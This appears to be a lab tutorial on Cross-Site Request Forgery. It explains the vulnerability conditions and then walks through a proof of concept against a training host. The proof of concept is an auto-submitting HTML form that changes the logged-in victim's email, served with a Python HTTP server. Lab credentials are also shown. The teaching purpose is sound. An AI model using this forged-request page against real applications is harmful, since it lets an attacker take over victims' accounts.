Cross-Site Request Forgery (CSRF) tricks a victim's browser into sending requests the user never intended to a web application where they are authenticated, typically from an attacker-crafted page. Because the browser attaches the session cookie automatically, the forged request carries the victim's identity and privileges.

Vulnerability Conditions

A web application is vulnerable to CSRF when:

  • All required request parameters can be determined or guessed by the attacker, i.e. the request contains no per-request secret (anti-CSRF token) that the attacker cannot know
  • Session management relies solely on HTTP cookies, which the browser attaches automatically to every request for the application's domain (caveat: browsers that treat cookies without an explicit SameSite attribute as Lax will withhold them on cross-site POSTs, so in practice the cookie must be SameSite=None or the browser must not enforce that default)

Requirements for Exploitation

  • Craft a malicious web page that issues a valid cross-site request impersonating the victim
  • Victim must be logged into the application when the malicious request is issued

CSRF Example

Login: crazygorilla983 / pisces at http://xss.htb.net

With Burp Suite intercepting (Intercept On), clicking "Save" on the profile page reveals a POST request to /api/update-profile carrying only the email, telephone and country parameters and no anti-CSRF token. Every value is therefore attacker-controllable, and the session is identified by the cookie alone.

Create malicious HTML page (notmalicious.html):

<html>
  <body>
    <!-- Cross-site form post to the target endpoint; the victim's session cookie
         is attached by the browser automatically -->
    <form id="submitMe" action="http://xss.htb.net/api/update-profile" method="POST">
      <input type="hidden" name="email" value="attacker@htb.net" />
      <!-- "(227)-750-8112", written with HTML entities for the parentheses and hyphens -->
      <input type="hidden" name="telephone" value="&#40;227&#41;&#45;750&#45;8112" />
      <input type="hidden" name="country" value="CSRF_POC" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // Submit as soon as the page loads, so the victim needs no interaction
      document.getElementById("submitMe").submit()
    </script>
  </body>
</html>

Serve the page from the attacking machine (http.server listens on all interfaces by default, so the victim's browser can reach it over the VPN):

python -m http.server 1337

While still logged in as Ela Stienen (crazygorilla983) in the same browser, visit http://<VPN/TUN Adapter IP>:1337/notmalicious.html. The form submits automatically and the profile details change to the attacker-specified values, confirming the CSRF vulnerability. If the profile does not change, check whether the session cookie is being withheld from the cross-site POST (SameSite restrictions) before concluding the endpoint is safe.